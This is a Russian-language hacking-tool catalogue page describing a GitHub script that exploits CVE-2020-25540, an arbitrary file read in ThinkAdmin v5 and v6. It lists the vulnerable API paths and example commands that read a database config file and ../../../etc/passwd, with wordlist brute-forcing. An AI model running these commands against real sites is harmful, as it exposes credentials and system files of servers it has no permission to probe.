Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-25540 — ThinkAdmin v5 v6 — эксплуатация уязвимости произвольного чтения файлов, возможен перебор по настраиваемому словарю | Kitploit
Инструменты/GitHubGitHub/simonlee-hello/cve-2020-25540
Атаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubsimonlee-hello/cve-2020-25540

CVE-2020-25540

ThinkAdmin v5 v6 — эксплуатация уязвимости произвольного чтения файлов, возможен перебор по настраиваемому словарю

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cve-2020-25540

Этот скрипт предназначен для эксплуатации уязвимости произвольного чтения файлов в ThinkAdmin версий v5 и v6.

==При этом путь к API может отличаться в разных версиях (некоторые являются форками оригинального ThinkAdmin).==

  • Оригинальный интерфейс: /admin.html?s=admin/api.Update/get?/encode/xxxx
  • В моей версии (форк некой финансовой пирамиды): /admin.html?s=admin/api.Update/read?encode=xxxx

Базовое использование

root@kitploit:~
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
                         [-p PARALLEL]

通过 API 读取文件并获取响应

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标 IP 地址或域名
  -f FILE, --file FILE  要读取的文件路径
  -w WORDLIST, --wordlist WORDLIST
                        字典文件路径,提供多个文件路径或文件名
  -b BASE_PATH, --base-path BASE_PATH
                        基础路径,用于拼接字典文件中的路径
  -p PARALLEL, --parallel PARALLEL
                        并行线程数
root@kitploit:~
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10
Скачать инструмент